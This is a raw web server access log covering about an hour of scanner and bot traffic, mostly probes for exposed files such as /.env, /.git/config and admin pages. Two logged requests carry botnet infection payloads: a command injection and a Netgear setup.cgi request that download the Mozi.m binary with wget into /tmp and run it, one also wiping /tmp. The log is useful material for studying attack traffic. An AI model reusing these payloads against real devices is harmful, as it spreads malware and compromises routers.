180.149.125.165 - - [07/Nov/2021:01:23:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
35.233.62.116 - - [07/Nov/2021:01:24:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.26.0"
172.104.131.24 - - [07/Nov/2021:01:28:48 +0100] "ABCDEFGHIJKLMNOPQRSTUVWXYZ9999" 501 345 "-" "-"
20.115.114.27 - - [07/Nov/2021:01:28:59 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
209.141.62.185 - - [07/Nov/2021:01:29:16 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
20.115.114.27 - - [07/Nov/2021:01:29:28 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
171.123.92.247 - - [07/Nov/2021:01:29:51 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 319 "-" "Hello, World"
20.115.114.27 - - [07/Nov/2021:01:30:11 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
20.115.114.27 - - [07/Nov/2021:01:30:24 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
20.115.114.27 - - [07/Nov/2021:01:30:26 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
20.115.114.27 - - [07/Nov/2021:01:30:35 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
180.149.125.173 - - [07/Nov/2021:01:30:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
128.14.141.34 - - [07/Nov/2021:01:31:05 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
88.80.189.57 - - [07/Nov/2021:01:31:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
20.115.114.27 - - [07/Nov/2021:01:31:42 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
20.115.114.27 - - [07/Nov/2021:01:32:07 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
20.115.114.27 - - [07/Nov/2021:01:32:35 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
201.184.54.180 - - [07/Nov/2021:01:34:51 +0100] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0" 400 329 "-" "-"
88.80.189.57 - - [07/Nov/2021:01:35:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
209.141.56.209 - - [07/Nov/2021:01:37:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
193.118.53.210 - - [07/Nov/2021:01:40:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
195.37.190.88 - - [07/Nov/2021:01:41:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:10.0) Gecko/20100101 Firefox/10.0"
209.141.56.209 - - [07/Nov/2021:01:42:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
193.118.53.194 - - [07/Nov/2021:01:45:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
222.186.19.235 - - [07/Nov/2021:01:46:43 +0100] "GET http://fuwu.sogou.com/404/index.html HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.12 Safari/534.24"
222.186.19.235 - - [07/Nov/2021:01:46:43 +0100] "\x16\x03\x01" 501 318 "-" "-"
222.186.19.235 - - [07/Nov/2021:01:46:43 +0100] "GET http://fuwu.sogou.com/404/index.html HTTP/1.1" 404 320 "-" "Mozilla/5.0 ArchLinux (X11; U; Linux x86_64; en-US) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.100 Safari/534.30"
132.145.39.16 - - [07/Nov/2021:01:49:06 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
132.145.39.16 - - [07/Nov/2021:01:49:06 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
186.0.90.186 - - [07/Nov/2021:01:52:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
180.151.229.68 - - [07/Nov/2021:01:53:18 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
180.149.125.172 - - [07/Nov/2021:01:53:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
180.149.125.173 - - [07/Nov/2021:01:54:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
5.8.16.169 - - [07/Nov/2021:01:56:04 +0100] "GET /.env HTTP/1.1" 404 309 "-" "-"
186.33.76.224 - - [07/Nov/2021:01:56:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
161.35.86.181 - - [07/Nov/2021:01:57:24 +0100] "CONNECT leakix.net:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
161.35.86.181 - - [07/Nov/2021:01:57:25 +0100] "GET /idx_config/ HTTP/1.1" 404 316 "-" "l9explore/1.3.0"
161.35.86.181 - - [07/Nov/2021:01:57:25 +0100] "GET /login.action HTTP/1.1" 404 317 "-" "l9explore/1.3.0"
161.35.86.181 - - [07/Nov/2021:01:57:25 +0100] "GET /frontend_dev.php/$ HTTP/1.1" 404 323 "-" "l9explore/1.3.0"
probe-nl001.rand0.leakix.org - - [07/Nov/2021:01:57:25 +0100] "GET /server-status HTTP/1.1" 403 322 "-" "l9explore/1.3.0"
161.35.86.181 - - [07/Nov/2021:01:57:25 +0100] "GET /.env HTTP/1.1" 404 309 "-" "l9explore/1.3.0"
161.35.86.181 - - [07/Nov/2021:01:57:25 +0100] "GET /debug/default/view?panel=config HTTP/1.1" 404 323 "-" "l9explore/1.3.0"
161.35.86.181 - - [07/Nov/2021:01:57:26 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "l9explore/1.3.0"
161.35.86.181 - - [07/Nov/2021:01:57:26 +0100] "GET /telescope/requests HTTP/1.1" 404 323 "-" "l9explore/1.3.0"
161.35.86.181 - - [07/Nov/2021:01:57:26 +0100] "GET /info.php HTTP/1.1" 404 313 "-" "l9explore/1.3.0"
161.35.86.181 - - [07/Nov/2021:01:57:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "l9explore/1.3.0"
161.35.86.181 - - [07/Nov/2021:01:57:26 +0100] "GET /s/lkx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1" 404 380 "-" "l9explore/1.3.0"
161.35.86.181 - - [07/Nov/2021:01:57:26 +0100] "GET /v2/_catalog HTTP/1.1" 404 316 "-" "l9explore/1.3.0"
161.35.86.181 - - [07/Nov/2021:01:57:26 +0100] "GET /api/search?folderIds=0 HTTP/1.1" 404 315 "-" "l9explore/1.3.0"
161.35.86.181 - - [07/Nov/2021:01:57:27 +0100] "GET /config.json HTTP/1.1" 404 316 "-" "l9explore/1.3.0"
161.35.86.181 - - [07/Nov/2021:01:57:27 +0100] "GET /.json HTTP/1.1" 404 310 "-" "l9explore/1.3.0"
172.104.140.107 - - [07/Nov/2021:02:03:18 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
172.104.140.107 - - [07/Nov/2021:02:03:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:18 +0100] "GET /nmaplowercheck1636246998 HTTP/1.1" 404 329 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:18 +0100] "GET /Portal0000.htm HTTP/1.1" 404 319 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:18 +0100] "GET /2aQx HTTP/1.1" 404 309 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:18 +0100] "GET /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 HTTP/1.1" 200 1229 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:18 +0100] "GET /.git/HEAD HTTP/1.1" 404 314 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:18 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
172.104.140.107 - - [07/Nov/2021:02:03:18 +0100] "GET /__Additional HTTP/1.1" 404 317 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:18 +0100] "GET /HNAP1 HTTP/1.1" 404 310 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:18 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:18 +0100] "GET /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 HTTP/1.1" 200 1229 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:18 +0100] "POST /sdk HTTP/1.1" 404 308 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:19 +0100] "GET /Portal/Portal.mwsl HTTP/1.1" 404 323 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:19 +0100] "POST /scripts/WPnBr.dll HTTP/1.1" 404 322 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:19 +0100] "HEAD / HTTP/1.1" 200 - "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:19 +0100] "GET /docs/cplugError.html/ HTTP/1.1" 404 326 "-" "curl/7.54.0"
172-104-140-107.ip.linodeusercontent.com - - [07/Nov/2021:02:03:19 +0100] "GET /server-status HTTP/1.1" 403 322 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:19 +0100] "GET /pools/default/buckets HTTP/1.1" 404 326 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:19 +0100] "GET /admin.aspx HTTP/1.1" 404 315 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:19 +0100] "GET /CSS/Miniweb.css HTTP/1.1" 404 320 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:19 +0100] "GET /pools HTTP/1.1" 404 310 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:19 +0100] "GET /default.pl HTTP/1.1" 404 315 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:19 +0100] "GET /home.shtml HTTP/1.1" 404 315 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:20 +0100] "GET /default.php HTTP/1.1" 404 316 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:20 +0100] "GET /main.aspx HTTP/1.1" 404 314 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:20 +0100] "GET /main.jsp HTTP/1.1" 404 313 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:20 +0100] "GET /indice.jsp HTTP/1.1" 404 315 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:20 +0100] "GET /admin.asp HTTP/1.1" 404 314 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:21 +0100] "GET /main.pl HTTP/1.1" 404 312 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:21 +0100] "GET /indice.php HTTP/1.1" 404 315 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:21 +0100] "GET /admin.pl HTTP/1.1" 404 313 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:21 +0100] "GET /menu.pl HTTP/1.1" 404 312 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:21 +0100] "GET /readme.txt HTTP/1.1" 404 315 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:22 +0100] "GET /menu.shtml HTTP/1.1" 404 315 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:22 +0100] "GET /base.aspx HTTP/1.1" 404 314 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:22 +0100] "GET /main.cfm HTTP/1.1" 404 313 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:22 +0100] "GET /main.shtml HTTP/1.1" 404 315 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:22 +0100] "GET /start.pl HTTP/1.1" 404 313 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:23 +0100] "GET /admin.html HTTP/1.1" 404 315 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:23 +0100] "GET /menu.asp HTTP/1.1" 404 313 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:23 +0100] "GET /menu.jhtml HTTP/1.1" 404 315 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:23 +0100] "GET /inicio.shtml HTTP/1.1" 404 317 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:23 +0100] "GET /home.pl HTTP/1.1" 404 312 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:24 +0100] "GET /start.asp HTTP/1.1" 404 314 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:24 +0100] "GET /default.asp HTTP/1.1" 404 316 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:24 +0100] "GET /default.cfm HTTP/1.1" 404 316 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:24 +0100] "GET /start.jhtml HTTP/1.1" 404 316 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:24 +0100] "GET /indice.shtml HTTP/1.1" 404 317 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:25 +0100] "GET /menu.jsa HTTP/1.1" 404 313 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:25 +0100] "GET /main.cgi HTTP/1.1" 404 313 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:25 +0100] "GET /default.aspx HTTP/1.1" 404 317 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:25 +0100] "GET /start.jsa HTTP/1.1" 404 314 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:25 +0100] "GET /admin.shtml HTTP/1.1" 404 316 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:26 +0100] "GET /admin.cfm HTTP/1.1" 404 314 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:26 +0100] "GET /localstart.jhtml HTTP/1.1" 404 321 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:26 +0100] "GET /main.jsa HTTP/1.1" 404 313 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:26 +0100] "GET /start.jsp HTTP/1.1" 404 314 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:26 +0100] "GET /default.html HTTP/1.1" 404 317 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:27 +0100] "GET /base.inc HTTP/1.1" 404 313 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:27 +0100] "GET /indice.asp HTTP/1.1" 404 315 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:27 +0100] "GET /indice.cgi HTTP/1.1" 404 315 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:27 +0100] "GET /home.jsp HTTP/1.1" 404 313 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:28 +0100] "GET /main.html HTTP/1.1" 404 314 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:28 +0100] "GET /menu.html HTTP/1.1" 404 314 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:28 +0100] "GET /localstart.asp HTTP/1.1" 404 319 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:28 +0100] "GET /localstart.aspx HTTP/1.1" 404 320 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:28 +0100] "\x16\x03\x01\x02" 501 319 "-" "-"
172.104.140.107 - - [07/Nov/2021:02:03:28 +0100] "GET /start.html HTTP/1.1" 404 315 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:29 +0100] "GET /base.jsa HTTP/1.1" 404 313 "-" "curl/7.54.0"
172.104.140.107 - - [07/Nov/2021:02:03:29 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
172.104.140.107 - - [07/Nov/2021:02:03:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
54.36.148.226 - - [07/Nov/2021:02:07:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
209.141.62.185 - - [07/Nov/2021:02:09:02 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
205.185.124.100 - - [07/Nov/2021:02:09:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
128.1.248.26 - - [07/Nov/2021:02:10:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
118.96.152.223 - - [07/Nov/2021:02:12:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
188.119.51.126 - - [07/Nov/2021:02:14:53 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
188.119.51.126 - - [07/Nov/2021:02:14:53 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
45.80.184.107 - - [07/Nov/2021:02:15:45 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
45.80.184.107 - - [07/Nov/2021:02:15:45 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
205.185.124.100 - - [07/Nov/2021:02:16:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
103.212.130.107 - - [07/Nov/2021:02:16:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
202.73.34.226 - - [07/Nov/2021:02:20:33 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
202.73.34.226 - - [07/Nov/2021:02:20:34 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
24.173.125.28 - - [07/Nov/2021:02:24:42 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
24.173.125.28 - - [07/Nov/2021:02:24:43 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.14.70.9 - - [07/Nov/2021:02:25:10 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.14.70.9 - - [07/Nov/2021:02:25:10 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.14.70.9 - - [07/Nov/2021:02:27:16 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.14.70.9 - - [07/Nov/2021:02:27:16 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.14.70.9 - - [07/Nov/2021:02:27:29 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.14.70.9 - - [07/Nov/2021:02:27:30 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
202.5.52.110 - - [07/Nov/2021:02:28:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
45.33.65.249 - - [07/Nov/2021:02:29:45 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
45.33.65.249 - - [07/Nov/2021:02:29:46 +0100] "GET /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 HTTP/1.1" 200 1229 "-" "curl/7.54.0"
45.33.65.249 - - [07/Nov/2021:02:29:46 +0100] "GET /OLVk HTTP/1.1" 404 309 "-" "curl/7.54.0"
45.33.65.249 - - [07/Nov/2021:02:29:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "curl/7.54.0"
45.33.65.249 - - [07/Nov/2021:02:29:46 +0100] "GET /Portal0000.htm HTTP/1.1" 404 319 "-" "curl/7.54.0"
45.33.65.249 - - [07/Nov/2021:02:29:46 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
45.33.65.249 - - [07/Nov/2021:02:29:46 +0100] "POST /scripts/WPnBr.dll HTTP/1.1" 404 322 "-" "curl/7.54.0"
45.33.65.249 - - [07/Nov/2021:02:29:46 +0100] "GET /start.jhtml HTTP/1.1" 404 316 "-" "curl/7.54.0"
45.33.65.249 - - [07/Nov/2021:02:29:46 +0100] "GET /nmaplowercheck1636248586 HTTP/1.1" 404 329 "-" "curl/7.54.0"
45.33.65.249 - - [07/Nov/2021:02:29:46 +0100] "GET /__Additional HTTP/1.1" 404 317 "-" "curl/7.54.0"
45.33.65.249 - - [07/Nov/2021:02:29:46 +0100] "GET /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 HTTP/1.1" 200 1229 "-" "curl/7.54.0"
45.33.65.249 - - [07/Nov/2021:02:29:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "curl/7.54.0"
45.33.65.249 - - [07/Nov/2021:02:29:46 +0100] "GET /HNAP1 HTTP/1.1" 404 310 "-" "curl/7.54.0"
45.33.65.249 - - [07/Nov/2021:02:29:46 +0100] "GET /base.html HTTP/1.1" 404 314 "-" "curl/7.54.0"
45.33.65.249 - - [07/Nov/2021:02:29:46 +0100] "GET /.git/HEAD HTTP/1.1" 404 314 "-" "curl/7.54.0"
45.33.65.249 - - [07/Nov/2021:02:29:46 +0100] "GET /Portal/Portal.mwsl HTTP/1.1" 404 323 "-" "curl/7.54.0"
45.33.65.249 - - [07/Nov/2021:02:29:46 +0100] "GET /menu.jsa HTTP/1.1" 404 313 "-" "curl/7.54.0"
45.33.65.249 - - [07/Nov/2021:02:29:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "curl/7.54.0"
45.33.65.249 - - [07/Nov/2021:02:29:47 +0100] "POST /sdk HTTP/1.1" 404 308 "-" "curl/7.54.0"
45.33.65.249 - - [07/Nov/2021:02:29:47 +0100] "GET /CSS/Miniweb.css HTTP/1.1" 404 320 "-" "curl/7.54.0"
45.33.65.249 - - [07/Nov/2021:02:29:47 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "curl/7.54.0"
45.33.65.249 - - [07/Nov/2021:02:29:47 +0100] "GET /docs/cplugError.html/ HTTP/1.1" 404 326 "-" "curl/7.54.0"
45.33.65.249 - - [07/Nov/2021:02:29:47 +0100] "HEAD / HTTP/1.1" 200 - "-" "curl/7.54.0"
45.33.65.249 - - [07/Nov/2021:02:29:47 +0100] "GET /indice.php HTTP/1.1" 404 315 "-" "curl/7.54.0"
45-33-65-249.ip.linodeusercontent.com - - [07/Nov/2021:02:29:46 +0100] "GET /server-status HTTP/1.1" 403 322 "-" "curl/7.54.0"
45.33.65.249 - - [07/Nov/2021:02:29:47 +0100] "GET /pools/default/buckets HTTP/1.1" 404 326 "-" "curl/7.54.0"
45.33.65.249 - - [07/Nov/2021:02:29:47 +0100] "GET /localstart.php HTTP/1.1" 404 319 "-" "curl/7.54.0"
45.33.65.249 - - [07/Nov/2021:02:29:47 +0100] "GET /pools HTTP/1.1" 404 310 "-" "curl/7.54.0"
45.33.65.249 - - [07/Nov/2021:02:29:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "curl/7.54.0"
45.80.184.107 - - [07/Nov/2021:02:29:48 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
45.80.184.107 - - [07/Nov/2021:02:29:49 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
45.33.65.249 - - [07/Nov/2021:02:29:53 +0100] "\x16\x03\x01\x02" 501 319 "-" "-"
45.33.65.249 - - [07/Nov/2021:02:29:54 +0100] "\x16\x03\x01\x02" 501 319 "-" "-"
45.33.65.249 - - [07/Nov/2021:02:29:56 +0100] "\x16\x03\x01\x02" 501 319 "-" "-"
45.33.65.249 - - [07/Nov/2021:02:29:58 +0100] "\x16\x03\x01\x02" 501 319 "-" "-"
112.239.22.205 - - [07/Nov/2021:02:31:34 +0100] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://112.239.22.205:53857/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 310 "-" "-"
